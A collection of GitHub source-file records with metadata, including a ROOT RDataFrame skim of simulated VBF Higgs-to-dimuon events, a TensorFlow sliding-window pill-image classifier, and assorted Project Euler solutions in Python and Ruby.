dd6903b2135150445b4f9eae7e620e64fdba6467
refs/heads/master
2023-02-27T11:42:28.981766
2021-01-31T16:10:17
2021-01-31T16:10:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6431187987327576, "alphanum_fraction": 0.6789638996124268, "avg_line_length": 40.543479919433594, "blob_id": "67764833c9c08c2cee82c5c3a2c857c5d1b8c72b", "content_id": "6dfacfcf8a3800548cb19aa4d7e07a92527a5f09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3822, "license_type": "no_license", "max_line_length": 377, "num_lines": 92, "path": "/converter.py", "repo_name": "silviodonato/DelphesSkim-old", "src_encoding": "UTF-8", "text": "import ROOT\n\nsampleName = \"vbfHmm_powheg\"\n\nindex = 0\n#for i in range(0, 38):\n# print(i)\n\t\n\t\nsamples = {\"vbfHmm_powheg\":\n\"root://eoscms.cern.ch//store/group/upgrade/delphes_output/YR_Delphes/Delphes342pre14/VBFHToMuMu_M125_14TeV_powheg_pythia8_200PU/VBFHToMuMu_M125_14TeV_powheg_pythia8_*%d.root\"%index\n}\n\n\nInvariantMass_code ='''\nfloat InvariantMass (float pt1, float eta1, float phi1, float mass1, float pt2, float eta2, float phi2, float mass2)\n{\n TLorentzVector mu1, mu2;\n mu1.SetPtEtaPhiM( pt1, eta1, phi1, mass1);\n mu2.SetPtEtaPhiM( pt2, eta2, phi2, mass2);\n float mass = (mu1+mu2).M();\n return mass;\n}\n'''\n\nmqq_code ='''\nfloat mqq (float pt1, float eta1, float phi1, float mass1, float pt2, float eta2, float phi2, float mass2)\n{\n TLorentzVector j1, j2;\n j1.SetPtEtaPhiM( pt1, eta1, phi1, mass1);\n j2.SetPtEtaPhiM( pt2, eta2, phi2, mass2);\n float mass = (j1+j2).M();\n return mass;\n}\n'''\n########################\n\ndf = ROOT.RDataFrame(\"Delphes\", samples[sampleName])\n\n#sum = df.Filter(\"MuonTight_size > 0\").Sum(\"Jet_size\")\n#print(sum.GetValue())\n\ndf_out = df.Define(\"sum_size\", \"MuonTight_size+Jet_size\")\n\n\ndf_out = df_out.Define(\"MuonTight_pt\", \"MuonTight.PT\")\ndf_out = df_out.Define(\"MuonTight_eta\", \"MuonTight.Eta\")\ndf_out = df_out.Define(\"MuonTight_phi\", \"MuonTight.Phi\")\ndf_out = df_out.Define(\"MuonTight_t\", \"MuonTight.T\")\ndf_out = df_out.Define(\"MuonTight_charge\", \"MuonTight.Charge\")\n#df_out = df_out.Define(\"MuonTight_particle\", \"MuonTight.Particle\")\ndf_out = df_out.Define(\"MuonTight_isolationvar\", \"MuonTight.IsolationVar\")\ndf_out = df_out.Define(\"MuonTight_isolationvarrhocorr\", \"MuonTight.IsolationVarRhoCorr\")\ndf_out = df_out.Define(\"MuonTight_sumptcharged\", \"MuonTight.SumPtCharged\")\ndf_out = df_out.Define(\"MuonTight_sumptneutral\", \"MuonTight.SumPtNeutral\")\ndf_out = df_out.Define(\"MuonTight_sumptchargedPU\", \"MuonTight.SumPtChargedPU\")\ndf_out = df_out.Define(\"MuonTight_sumpt\", \"MuonTight.SumPt\")\n\ndf_out = df_out.Define(\"Jet_pt\", \"Jet.PT\")\ndf_out = df_out.Define(\"Jet_eta\", \"Jet.Eta\")\ndf_out = df_out.Define(\"Jet_phi\", \"Jet.Phi\")\ndf_out = df_out.Define(\"Jet_mass\", \"Jet.Mass\")\n\n\n## Define DiMuon mass ##\nROOT.gInterpreter.Declare(InvariantMass_code) ## compile invariant mass code\ndf_out = df_out.Define(\"DiMuon_mass\", \"InvariantMass( MuonTight_pt[0], MuonTight_eta[0], MuonTight_phi[0], 0.106, MuonTight_pt[1], MuonTight_eta[1], MuonTight_phi[1], 0.106)\") ## define DiMuon_mass variable (0.106 GeV is the muon mass)\n###\n\nROOT.gInterpreter.Declare(mqq_code) ## compile invariant mass code\ndf_out = df_out.Define(\"DiJet_mass\", \"mqq( Jet_pt[0], Jet_eta[0], Jet_phi[0], Jet_mass[0], Jet_pt[1], Jet_eta[1], Jet_phi[1], Jet_mass[1] )\")\n\n\n## Cuts ##\ndf_out = df_out.Filter(\"MuonTight_size >= 2\") #require at least two muon\ndf_out = df_out.Filter(\"MuonTight_pt[0] > 20 && MuonTight_pt[1] > 20\")\ndf_out = df_out.Filter(\"abs(MuonTight_eta[0]) < 2.8 && abs(MuonTight_eta[1]) < 2.8\") #require the first muon to have pt>50 GeV\ndf_out = df_out.Filter(\"DiMuon_mass > 110 && DiMuon_mass < 150\") #require at least two muon\n\n#df_out = df_out.Filter(\"Jet_size >= 2\")\ndf_out = df_out.Filter(\"Jet_pt[0] > 35 && Jet_pt[1] > 25\")\ndf_out = df_out.Filter(\"abs(Jet_eta[0]) < 4.7 && abs(Jet_eta[1]) < 4.7\")\ndf_out = df_out.Filter(\"abs(Jet_eta[0] - Jet_eta[1]) < 2.5 \")\ndf_out = df_out.Filter(\"DiJet_mass > 400\")\n\nhist = df_out.Histo1D(\"MuonTight_pt\")\n\nprint(\"Launch Snapshot\")\n\ndf_out.Snapshot(\"Events\", \"%s_%d.root\"%(sampleName, index), {'MuonTight_pt', 'MuonTight_eta', 'MuonTight_phi', 'MuonTight_t', 'MuonTight_charge', 'MuonTight_isolationvar', 'MuonTight_isolationvarrhocorr', 'MuonTight_sumptcharged', 'MuonTight_sumptneutral', 'MuonTight_sumptchargedPU', 'MuonTight_sumpt', 'Jet_pt', 'Jet_eta', 'Jet_phi', 'Jet_mass','DiMuon_mass', 'DiJet_mass'});\n\nprint(\"Finished\")\n" } ]
1
Trenchers/Automated-Dispensary
https://github.com/Trenchers/Automated-Dispensary
eb01a23b6c9ffcee82581a1c02da3c799bf12300
1930b448089e1c18b1d4f63bb0ede5c649155527
48310b3248e32a792c6e9a9282636c440097370c
refs/heads/master
2021-04-06T08:21:37.297497
2018-04-09T16:00:44
2018-04-09T16:00:44
125,255,991
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.7920354008674622, "alphanum_fraction": 0.8274336457252502, "avg_line_length": 112, "blob_id": "96110c42cdb585c503b91d3059fc82caa16b4529", "content_id": "acff91bf65ed5baaf8535a0936f70bd3e5233cc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 226, "license_type": "no_license", "max_line_length": 202, "num_lines": 2, "path": "/README.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "# Automated-Dispensary\nThe scripts are currently in use, but the Raw Datasets above have been deprecated. The new dataset is uploaded here: https://drive.google.com/drive/folders/1EC2PbwGVHGyoi95cuxI8wS45CqqbBJb1?usp=sharing.\n" }, { "alpha_fraction": 0.8245614171028137, "alphanum_fraction": 0.8245614171028137, "avg_line_length": 56, "blob_id": "b45716a0234dfedad85c5fa1a160e1accd7436e7", "content_id": "dde1f504fdede08ec801f83d77b3384e26b6aa0a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 57, "license_type": "no_license", "max_line_length": 56, "num_lines": 1, "path": "/Raw Datasets/1.Cheston Cold/readme.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw images of Cheston cold tablets.\n" }, { "alpha_fraction": 0.801886796951294, "alphanum_fraction": 0.801886796951294, "avg_line_length": 105, "blob_id": "8b25e3c37549b08e98f49f168f1dc561c3ea4425", "content_id": "47daec2b622f1d7181ae6dd96c5d584a9ebcb9b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 106, "license_type": "no_license", "max_line_length": 105, "num_lines": 1, "path": "/Raw Datasets/info.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw datasets. Enjoy. Try cooking it for a different flavour. Tastes better than raw.\n" }, { "alpha_fraction": 0.542614221572876, "alphanum_fraction": 0.5600157976150513, "avg_line_length": 29.506250381469727, "blob_id": "2cdbe6241475721935e92744784c11ffafa374c0", "content_id": "770e7216d9e155e3ab6295e72d404a4976c01fe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5057, "license_type": "no_license", "max_line_length": 152, "num_lines": 160, "path": "/scripts/sliding_window.py", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "import argparse\r\nimport sys\r\nimport time\r\nimport os\r\nimport cv2\r\n\"\"\"\r\nDEL_X=2 #change in X and Y\r\nDEL_Y=1\r\nSIDE_X=30 #initial side lengths\r\nSIDE_Y=40\r\n\r\ndef crop_img(path,pos): #pos is the index of the sliding window\r\n img=cv2.imread(path)\r\n [x_max,y_max]=img.size\r\n if((pos*DELTA_X/x_max)*DELTA_Y<y_max):\r\n os.remove('result.csv')\r\n cropped_img=img[int((pos*DELTA_X/x_max)*DELTA_Y):int((pos*DELTA_X/x_max)*DELTA_Y)+SIDE_Y , int(pos*DELTA_X%x_max):int(pos*DELTA_X%x_max)+SIDE_X]\r\n cv2.imwrite(path2)\r\n os.system(\"python -m scripts.label_image \\\r\n --graph=tf_files/retrained_graph.pb \\\r\n --image=\"+path2)\r\n file=open('Database.csv')\r\n reader=csv.reader(file)\r\n data=list(reader)\r\n for x in data:\r\n if x[1]>0.95 and x[0]!='negative':\r\n print(x[0])\r\n print(\"at window no. \" + str(pos))\r\n break\r\n else:\r\n exit(0)\r\n \r\n \r\n\r\n\r\ni=0\r\nwhile True:\r\n crop_img(\"\",i)\r\n i=i+1\r\n \"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\ndef load_graph(model_file):\r\n graph = tf.Graph()\r\n graph_def = tf.GraphDef()\r\n\r\n with open(model_file, \"rb\") as f:\r\n graph_def.ParseFromString(f.read())\r\n with graph.as_default():\r\n tf.import_graph_def(graph_def)\r\n\r\n return graph\r\n\r\ndef read_tensor_from_image_file(file_name, input_height=299, input_width=299,\r\n\t\t\t\tinput_mean=0, input_std=255):\r\n input_name = \"file_reader\"\r\n output_name = \"normalized\"\r\n file_reader = tf.read_file(file_name, input_name)\r\n if file_name.endswith(\".png\"):\r\n image_reader = tf.image.decode_png(file_reader, channels = 3,\r\n name='png_reader')\r\n elif file_name.endswith(\".gif\"):\r\n image_reader = tf.squeeze(tf.image.decode_gif(file_reader,\r\n name='gif_reader'))\r\n elif file_name.endswith(\".bmp\"):\r\n image_reader = tf.image.decode_bmp(file_reader, name='bmp_reader')\r\n else:\r\n image_reader = tf.image.decode_jpeg(file_reader, channels = 3,\r\n name='jpeg_reader')\r\n float_caster = tf.cast(image_reader, tf.float32)\r\n dims_expander = tf.expand_dims(float_caster, 0);\r\n resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])\r\n normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])\r\n sess = tf.Session()\r\n result = sess.run(normalized)\r\n\r\n return result\r\n\r\ndef load_labels(label_file):\r\n label = []\r\n proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()\r\n for l in proto_as_ascii_lines:\r\n label.append(l.rstrip())\r\n return label\r\n\r\ndef make_pred(image):\r\n file_name = image\r\n model_file = \"tf_files/retrained_graph.pb\"\r\n label_file = \"tf_files/retrained_labels.txt\"\r\n input_height = 224\r\n input_width = 224\r\n input_mean = 128\r\n input_std = 128\r\n input_layer = \"input\"\r\n output_layer = \"final_result\"\r\n graph = load_graph(model_file)\r\n t = read_tensor_from_image_file(file_name,\r\n input_height=input_height,\r\n input_width=input_width,\r\n input_mean=input_mean,\r\n input_std=input_std)\r\n\r\n input_name = \"import/\" + input_layer\r\n output_name = \"import/\" + output_layer\r\n input_operation = graph.get_operation_by_name(input_name);\r\n output_operation = graph.get_operation_by_name(output_name);\r\n\r\n with tf.Session(graph=graph) as sess:\r\n start = time.time()\r\n results = sess.run(output_operation.outputs[0],\r\n {input_operation.outputs[0]: t}) #my code\r\n end=time.time()\r\n i=np.where(results==max(results[0]))[1][0]\r\n \r\n results = np.squeeze(results)\r\n\r\n top_k = results.argsort()[-5:][::-1]\r\n \r\n labels = load_labels(label_file)\r\n print(labels[i])\r\n print(max(results))\r\n return [labels,results] #mine\r\n\r\n \r\ndef sliding_window(file):\r\n points=[]\r\n xmin=0\r\n ymin=0\r\n xmax=160\r\n ymax=160\r\n image=cv2.imread(file)\r\n step=30\r\n path=\"tf_files/folder/buff\"\r\n while xmax<1000:\r\n xmin=xmin+step #correct this\r\n xmax=xmax+step\r\n ymin=0\r\n ymax=160\r\n while ymax<600:\r\n ymin=ymin+step\r\n ymax=ymax+step\r\n cropped_image = image[ymin:ymax,xmin:xmax]\r\n path_max=path+str(xmin)+\",\"+str(ymin)+\".jpg\"\r\n cv2.imwrite(path_max,cropped_image)\r\n #cv2.imshow(\"\",cropped_image)\r\n #time.sleep(2)\r\n #cv2.destroyAllWindows()\r\n result = make_pred(path_max)\r\n print(\"on window\",xmin,ymin)\r\n '''for x in range(len(result[0])):\r\n if(result[0][x]>=0.99):\r\n points.append({((xmax-xmin)/2),((ymax-ymin)/2)})\r\n break\r\n\t\t\t'''\r\n return points #returns a 1d array of centroids of all clusters\r\n \r\n \r\nsliding_window(\"C:/Users/Atharv/Desktop/ITSP/Photos/Digene.jpg\")\r\n\r\n \r\n" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 43, "blob_id": "a4509876326597f6286061e1a02dc4141494d047", "content_id": "435d35705ea04274e872853ac17636092720d9bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 43, "num_lines": 1, "path": "/Raw Datasets/2.Norflox/readme.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "This folder contains raw images of Norflox.\n" }, { "alpha_fraction": 0.8074533939361572, "alphanum_fraction": 0.8074533939361572, "avg_line_length": 160, "blob_id": "7d192bdd3fb1abe69c38adb234625da7f5d96956", "content_id": "e11d0fce9a1f355ad15f1cce1b54f5805665a245", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 161, "license_type": "no_license", "max_line_length": 160, "num_lines": 1, "path": "/scripts/README.md", "repo_name": "Trenchers/Automated-Dispensary", "src_encoding": "UTF-8", "text": "In this folder, we have written the sliding_window.py script. The retraining code and the labelling code has been taken from the Open Source code by TensorFlow.\n" } ]
6
racc/euler
https://github.com/racc/euler
fa10a9ed46ff9fe430801dc24447599671bca9c4
fe6c49fac51317be3bc42634881fdc43b65c8c87
4c726ce17465783ea4d8db829a69f8cc1b89e5be
refs/heads/master
2016-09-05T19:31:01.338705
2012-02-16T19:34:46
2012-02-16T19:34:46
2,204,438
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6361416578292847, "avg_line_length": 25.419355392456055, "blob_id": "47ecd8ef4995934d1842b892be907d5e99328fc9", "content_id": "17ab74a1e1ab3eab6e4e63821f5a34912a18bd78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 819, "license_type": "no_license", "max_line_length": 57, "num_lines": 31, "path": "/32/unusual_pandigitals.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport itertools\n\ndigits = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]\ndigits_set = set(digits)\nprod_tuples = [(3, 2), (4, 1)]\n\ndef prod_is_pandigital(prod, diff):\n\tsorted_digits = sorted(list(str(prod)) + diff)\n\treturn sorted_digits == digits\n\ndef iter_to_int(t):\n\treturn int(\"\".join(t))\n\nprods = set([])\n\nfor tup in prod_tuples:\n\tfor comb in itertools.combinations(digits, tup[0]):\n\t\tfor perm in itertools.permutations(comb):\n\t\t\tdiff = list(digits_set - set(perm))\n\t\t\ta = iter_to_int(perm)\n\t\t\tfor comb_diff in itertools.combinations(diff, tup[1]):\n\t\t\t\targs = list(comb_diff) + list(perm)\n\t\t\t\tfor perm_diff in itertools.permutations(comb_diff):\n\t\t\t\t\tb = iter_to_int(perm_diff)\n\t\t\t\t\tprod = a * b\n\t\t\t\t\tif (prod_is_pandigital(prod, args)):\n\t\t\t\t\t\tprods.add(prod)\n\t\nprint(reduce(lambda x, y: x + y, prods))\n" }, { "alpha_fraction": 0.4847457706928253, "alphanum_fraction": 0.5627118349075317, "avg_line_length": 12.409090995788574, "blob_id": "b72fc9a1e4c7114b3d41caea674d61bf073e47fa", "content_id": "59906b29c8ff005d6125d8c62b2a337012e853d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 295, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/53/combinations.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nFactorial = Hash[1,1,0,1]\n(2..101).each do |x|\n\tFactorial[x] = Factorial[x-1] * x\nend\n\ndef c(n, r)\n\tn_r = Factorial[n - r]\n\tFactorial[n] / (Factorial[r] * n_r)\nend\n\ncount = 0\n(1..100).each do |n|\n\t(1..n).each do |r|\n\t\tif c(n, r) > 1000000\n\t\t\tcount += 1\t\n\t\tend\n\tend\nend\n\np count\n" }, { "alpha_fraction": 0.5971302390098572, "alphanum_fraction": 0.6490066051483154, "avg_line_length": 29.200000762939453, "blob_id": "84a3d18a2dfa438ceb5e85658616aeaeb0ffc7bc", "content_id": "5da28f5816e9b08ba2fd0084b6099ead72712796", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 906, "license_type": "no_license", "max_line_length": 101, "num_lines": 30, "path": "/70/totient_permutations.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\n# To really make this faster, find the biggest number < 10 ** 7 which is the multiple\n# of two primes, where the totient function is a permutation\n#\n# This is because since phi(n) = n(1-1/p1)(1-1/p2)...(1-1/pk)\n# n/phi(n) = 1/((1-1/p1)(1-1/p2)...(1-1/pk))\n# We want to minimise n/phi(n) by maximising (1-1/p1)(1-1/p2)...(1-1/pk)\n# So to maximise it, we need to minimise the number of entries (each multiplication makes it smaller)\n# But also make p as large as possible...\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\ndef is_permutation(a, b):\n\treturn sorted(str(a)) == sorted(str(b)) \n\nmin_ratio = float(1000000000)\nmin_n = 0\n\nfor n in xrange(10 ** 6, 10 ** 7):\n\tt = totient(n)\n\tif is_permutation(n, t):\n\t\tratio = float(n) / float(t) \n\t\tif ratio < min_ratio:\n\t\t\tmin_ratio = ratio\n\t\t\tmin_n = n\n\nprint(min_n)\n" }, { "alpha_fraction": 0.410526305437088, "alphanum_fraction": 0.49473685026168823, "avg_line_length": 9.55555534362793, "blob_id": "d6313bdc2058720a407d75dd3e22ed6801ea4ae3", "content_id": "e1fb75fbdbe14868433eac2af65f8287207776bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 95, "license_type": "no_license", "max_line_length": 41, "num_lines": 9, "path": "/5/divisible.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\na = 20\nloop do\n\tbreak if (1..20).all? { |n| a % n == 0 }\n\ta += 20\nend\n\nputs a\n" }, { "alpha_fraction": 0.6275168061256409, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 23.83333396911621, "blob_id": "1846a201c4f7c7fd3509589908f5d31f29ab9ff0", "content_id": "d64f92380cb43121a6d0561eddc7cdb6738c7c94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/34/sum_factorial_digits.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\ncurious_nums = []\n\n# Came up with an arbitrary upper limit\nfor i in range(3, 1000000):\n\tsum_of_facts = reduce(lambda x, y: int(x) + math.factorial(int(y)), str(i), 0)\n\tif sum_of_facts == i:\n\t\tcurious_nums.append(i)\n\nprint(reduce(lambda x, y: x + y, curious_nums))\n" }, { "alpha_fraction": 0.613595724105835, "alphanum_fraction": 0.633273720741272, "avg_line_length": 24.227272033691406, "blob_id": "ab8e85c1f371d78ac93c1b032efbe5c268e59d9f", "content_id": "3fbc94b32f5557940b79f7bcfbf76e73849de2d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", "max_line_length": 56, "num_lines": 22, "path": "/21/amicable_pairs.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\ndef sum_of_divisors(x):\n\tlimit = int(math.ceil(math.sqrt(x))) + 1\n\tdivisors = []\n\tfor d in filter(lambda i: x % i == 0, range(1, limit)):\n\t\tdivisors.append(d)\n\t\tdividend = x / d\n\t\tif (dividend != d and dividend != x):\n\t\t\tdivisors.append(dividend)\n\t\n\treturn reduce(lambda x, y: x + y, divisors)\n\namicable_numbers = set([])\nfor a in range(4, 10000):\n\tb = sum_of_divisors(a)\n\tif (sum_of_divisors(b) == a and a != b):\n\t\tamicable_numbers.add(a)\n\t\tamicable_numbers.add(b)\t\n\t\nprint(reduce(lambda x, y: x + y, amicable_numbers))\n\t\t \n" }, { "alpha_fraction": 0.5768262147903442, "alphanum_fraction": 0.6322417855262756, "avg_line_length": 14.269230842590332, "blob_id": "746b209f11ecc6e8f311a71e581eede3555bdb90", "content_id": "438a7d869d4ddd575f04d844291905bade23610c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 38, "num_lines": 26, "path": "/73/proper_fractions_set.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom fractions import Fraction\n\nlower = Fraction(1, 3)\nupper = Fraction(1, 2)\nnum_start = 4001\nden = 12000\ncount = 0\n\nwhile den > 1:\n\tnum = num_start\n\twhile Fraction(num - 1, den) > lower:\n\t\tnum -= 1\t\n\n\tnum_start = num\n\tfrac = Fraction(num, den)\n\twhile frac < upper:\n\t\tif frac.denominator == den:\n\t\t\tcount += 1\n\t\tnum += 1\n\t\tfrac = Fraction(num, den)\n\n\tden -= 1\n\nprint(count)\n" }, { "alpha_fraction": 0.5610765814781189, "alphanum_fraction": 0.5859213471412659, "avg_line_length": 20.954545974731445, "blob_id": "72c1fa66086a739aabb42e64260c51ce36f544d1", "content_id": "6b7b84ea0c09ce7df70e229c88c996e5e0e08873", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "no_license", "max_line_length": 80, "num_lines": 22, "path": "/76/hundred_sum.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n# See http://en.wikipedia.org/wiki/Partition_function_(number_theory)\n\ncache = {}\ndef i(k, n):\n\t'''Number of partitions n, only using natural numbers at least as large as k'''\n\tif k > n:\n\t\treturn 0\n\telif k == n:\n\t\treturn 1\n\telse:\n\t\tif (k, n) in cache:\n\t\t\treturn cache[(k, n)]\n\t\telse:\n\t\t\tcached = i(k + 1, n) + i(k, n - k)\n\t\t\tcache[(k, n)] = cached\n\t\t\treturn cached\n\ndef p(n):\n return reduce(lambda x, y: x + i(y, n - y), xrange(1, (n/2) + 1), 0)\n\nprint(p(100))\n" }, { "alpha_fraction": 0.6193181872367859, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 18.518518447875977, "blob_id": "c93116dfaff48986a38e6a4103751150dd3299a7", "content_id": "6e32d4c35267fc63e9801dfe7a2aece063bd3dcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 528, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/87/prime_powers.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nLIMIT = 50_000_000\nPRIMES = Primes::sieve((LIMIT ** (0.5)).to_i)\n\ndef prime_power(power)\n\tPRIMES.map { |x| x ** power }.select { |x| x < LIMIT }\nend\n\nprime_squares = prime_power(2)\nprime_cubes = prime_power(3)\nprime_fourth = prime_power(4)\nnumbers = Set.new\n\nprime_squares.each do |s| \n\tprime_cubes.each do |c|\n\t\tprime_fourth.each do |f|\n\t\t\tsum = s + c + f\n\t\t\tnumbers << sum if sum < LIMIT\n\t\tend\n\tend\nend\n\np numbers.size\n\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5370370149612427, "avg_line_length": 17, "blob_id": "557b57c68748ea8cca85fe4bee07cfb7aee3fcf8", "content_id": "df1ebe04e41f3139a39b2a3d4b9f2958d4b6ba90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 216, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/util/ruby/primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "module Primes\n\tdef self.sieve(x)\n\t\tprimes = (0..x).to_a\n\t\tlimit = (x ** (0.5)).to_i\n\t\n\t\t(2..limit).each do |s|\n\t\t\t(2 * s).step(x, s).each { |t| primes[t] = nil }\n\t\tend\n\t\tprimes[0..1] = nil\n\t\tprimes.compact!\n\tend\nend\n" }, { "alpha_fraction": 0.5462962985038757, "alphanum_fraction": 0.5879629850387573, "avg_line_length": 12.5, "blob_id": "8874486bd8222316d13564a2e04288bb6dee2590", "content_id": "c40ff87d3982aae9e54312b99067a41613e5eacd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 216, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/12/triangle_divisors.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ntriangle = 1\ni\t= 2\n\nloop {\n\ttriangle += i\n\ti += 1\n\n\tlimit = Math.sqrt(triangle).to_i\n\tfactors =\t(1..limit).select { |x| triangle % x == 0 }.size * 2\n\tif factors > 500 \n\t\tputs triangle\n\t\tbreak\n\tend\n}\n" }, { "alpha_fraction": 0.375, "alphanum_fraction": 0.6458333134651184, "avg_line_length": 23, "blob_id": "94c2cd2de48cc3a23f7fb5d2d9c6dd329231a7b4", "content_id": "ee943990cfb7e474688592063c91802f2dc38d78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 48, "license_type": "no_license", "max_line_length": 35, "num_lines": 2, "path": "/3/factor.sh", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfactor 600851475143 | cut -d' ' -f5\n" }, { "alpha_fraction": 0.49444442987442017, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 17, "blob_id": "bc919cfd65f7478ef79fbc536b2703384421bb5d", "content_id": "5b821f106a493db9e3692d5bf91ff2a7196ce630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/40/irrational.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ns = \"\"\nfor i in range(1, 1000000):\n\ts += str(i)\n\ndef nth_digit(n):\n\treturn int(s[n-1])\n\nprint(reduce(lambda x, y: x * nth_digit(pow(10, y)), range(0, 6), 1))\n" }, { "alpha_fraction": 0.6247464418411255, "alphanum_fraction": 0.6490872502326965, "avg_line_length": 24.947368621826172, "blob_id": "c6057c0467791051cb70edce141cb47cabb1c3cf", "content_id": "15c1f9ea41b4c0807443907a8b49232e66f1fcde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 493, "license_type": "no_license", "max_line_length": 73, "num_lines": 19, "path": "/37/truncatable_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nPRIMES = Primes::sieve(800000)\nNON_TRUNCATABLE = [2, 3, 5, 7]\n\ndef is_truncatable_prime?(p)\n\treturn false if NON_TRUNCATABLE.include? p\n\tstr = p.to_s\n\tlimit = str.size\n\ttruncs = (0..limit).map do |x| \n\t[str[0..limit - x], str[x..limit]]\n\tend.flatten.uniq.reject { |x| x.empty? }\n\ttruncs.all? {|x| PRIMES.include? x.to_i }\nend\n\np PRIMES.select { |x| is_truncatable_prime?(x) }.reduce(:+)\n" }, { "alpha_fraction": 0.5830115675926208, "alphanum_fraction": 0.6293436288833618, "avg_line_length": 20.58333396911621, "blob_id": "fd5f8abe327937e6fa1c8b88d30898bcac3c8d18", "content_id": "1da3313ffcffdf8526c488ec6d66e45c77c54716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 259, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/30/narcissistic.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\nnumbers = []\nexponent = 5\n\nfor i in xrange(2, 1000000):\n\tsum_of_pow = reduce(lambda x, y: int(x) + math.pow(int(y), exponent), str(i), 0)\n\tif (sum_of_pow == i):\n\t\tnumbers.append(i)\n\nprint(reduce(lambda x, y: x + y, numbers))\n" }, { "alpha_fraction": 0.6145339608192444, "alphanum_fraction": 0.620853066444397, "avg_line_length": 22.44444465637207, "blob_id": "6195587b0f8bdbb8ab0425430e6b25ea58087d12", "content_id": "fea62a57fb667462d16347db7f35c5a6e6ccf40b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 633, 